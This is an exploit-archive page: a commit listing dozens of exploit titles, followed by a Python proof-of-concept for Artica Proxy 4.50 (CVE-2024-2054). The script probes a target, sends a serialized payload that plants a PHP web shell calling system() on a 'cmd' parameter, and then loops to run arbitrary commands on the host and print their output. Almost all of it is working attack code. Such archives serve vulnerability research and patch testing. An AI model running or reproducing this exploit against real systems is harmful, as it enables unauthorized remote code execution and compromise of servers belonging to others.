60175c9963
52 changes to exploits/shellcodes/ghdb Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS) Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS) Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE) DataEase 2.4.0 - Database Configuration Information Exposure Cosy+ firmware 21.2s7 - Command Injection Angular-Base64-Upload Library 0.1.20 - Remote Code Execution (RCE) K7 Ultimate Security K7RKScan.sys 17.0.2019 - Denial Of Service (DoS) ABB Cylon Aspect 3.07.02 - File Disclosure (Authenticated) ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE) ABB Cylon Aspect 3.07.02 - File Disclosure ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE) Cisco Smart Software Manager On-Prem 8-202206 - Account Takeover CyberPanel 2.3.6 - Remote Code Execution (RCE) IBM Security Verify Access 10.0.0 - Open Redirect during OAuth Flow Intelight X-1L Traffic controller Maxtime 1.9.6 - Remote Code Execution (RCE) KubeSphere 3.4.0 - Insecure Direct Object Reference (IDOR) MagnusSolution magnusbilling 7.3.0 - Command Injection Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover Progress Telerik Report Server 2024 Q1 (10.0.24.305) - Authentication Bypass Sonatype Nexus Repository 3.53.0-01 - Path Traversal Watcharr 1.43.0 - Remote Code Execution (RCE) Webmin Usermin 2.100 - Username Enumeration ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials ABB Cylon Aspect 3.08.01 - Arbitrary File Delete ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials ABB Cylon Aspect 3.08.01 - Arbitrary File Delete AquilaCMS 1.409.20 - Remote Command Execution (RCE) Artica Proxy 4.50 - Remote Code Execution (RCE) Centron 19.04 - Remote Code Execution (RCE) ChurchCRM 5.9.1 - SQL Injection CodeAstro Online Railway Reservation System 1.0 - Cross Site Scripting (XSS) CodeCanyon RISE CRM 3.7.0 - SQL Injection Elaine's Realtime CRM Automation 6.18.17 - Reflected XSS Feng Office 3.11.1.2 - SQL Injection flatCore 1.5 - Cross Site Request Forgery (CSRF) flatCore 1.5.5 - Arbitrary File Upload flatCore 1.5 - Cross Site Request Forgery (CSRF) flatCore 1.5.5 - Arbitrary File Upload GetSimpleCMS 3.3.16 - Remote Code Execution (RCE) Gnuboard5 5.3.2.8 - SQL Injection LearnPress WordPress LMS Plugin 4.2.7 - SQL Injection Litespeed Cache 6.5.0.1 - Authentication Bypass MiniCMS 1.1 - Cross Site Scripting (XSS) MoziloCMS 3.0 - Remote Code Execution (RCE) NEWS-BUZZ News Management System 1.0 - SQL Injection PandoraFMS 7.0NG.772 - SQL Injection phpIPAM 1.6 - Reflected Cross Site Scripting (XSS) PZ Frontend Manager WordPress Plugin 1.0.5 - Cross Site Request Forgery (CSRF) ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS) RosarioSIS 7.6 - SQL Injection Roundcube Webmail 1.6.6 - Stored Cross Site Scripting (XSS) Typecho 1.3.0 - Race Condition Typecho 1.3.0 - Stored Cross-Site Scripting (XSS) Typecho 1.3.0 - Race Condition Typecho 1.3.0 - Stored Cross-Site Scripting (XSS) X2CRM 8.5 - Stored Cross-Site Scripting (XSS) Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE) Microsoft Office 2019 MSO Build 1808 - NTLMv2 Hash Disclosure
76 lines
No EOL
2.3 KiB
Python
Executable file
76 lines
No EOL
2.3 KiB
Python
Executable file
# Exploit Title: Artica Proxy 4.50 - Remote Code Execution (RCE)
|
|
# Date: 23-04-2024
|
|
# Exploit Author: Madan
|
|
# Vendor Homepage: https://artica-proxy.com/
|
|
# Version: 4.40, 4.50
|
|
# Tested on: [relevant os]
|
|
# CVE : CVE-2024-2054
|
|
|
|
you can also find the exploit on my github repo:
|
|
https://github.com/Madan301/CVE-2024-2054
|
|
|
|
|
|
import requests
|
|
import base64
|
|
import urllib3
|
|
from colorama import Fore
|
|
|
|
print("Url format Ex: https://8x.3x.xx.xx:9000 the port 9000 might
|
|
sometimes vary from how artica proxy interface is hosted")
|
|
|
|
URL = input("Enter url: ")
|
|
if URL[-1]=="/":
|
|
ACTUAL_URL = URL[:-1]
|
|
else:
|
|
ACTUAL_URL = URL
|
|
|
|
ARTICA_URL = ACTUAL_URL
|
|
|
|
def check(ARTICA_URL):
|
|
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
|
|
try:
|
|
check = requests.get(ARTICA_URL+'/wizard/wiz.upload.php',verify=False)
|
|
except Exception as e:
|
|
print(Fore.RED+"Could not reach, check URL")
|
|
if check.status_code==200:
|
|
print(Fore.GREEN+"Vulnerable")
|
|
return True
|
|
else:
|
|
print(Fore.RED+"Not Vulnerable")
|
|
|
|
|
|
def exploit(ARTICA_URL):
|
|
|
|
payload = base64.b64encode(b"<?php system($_GET['cmd']); ?>").decode()
|
|
payload_data = {
|
|
"TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI": {
|
|
"cache_file": "/usr/share/artica-postfix/wizard/wiz.upload.php",
|
|
"cache_serializer": "json",
|
|
"cache_size": 999999999,
|
|
"cache_data": {
|
|
payload: {
|
|
"cache_date": 0,
|
|
"ttl": 999999999
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
|
|
while True:
|
|
PAYLOAD_CMD = input("enter command: ")
|
|
url = f"{ARTICA_URL}/wizard/wiz.wizard.progress.php?build-js={payload_data}"
|
|
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
|
|
response = requests.get(url, verify=False)
|
|
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
|
|
if response.status_code == 200:
|
|
cmd_url = f"{ARTICA_URL}/wizard/wiz.upload.php?cmd={PAYLOAD_CMD}"
|
|
cmd_response = requests.get(cmd_url, verify=False)
|
|
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
|
|
print(cmd_response.text)
|
|
else:
|
|
print("Failed to execute the payload")
|
|
|
|
check = check(ARTICA_URL=ACTUAL_URL)
|
|
if check==True:
|
|
exploit(ARTICA_URL=ARTICA_URL) |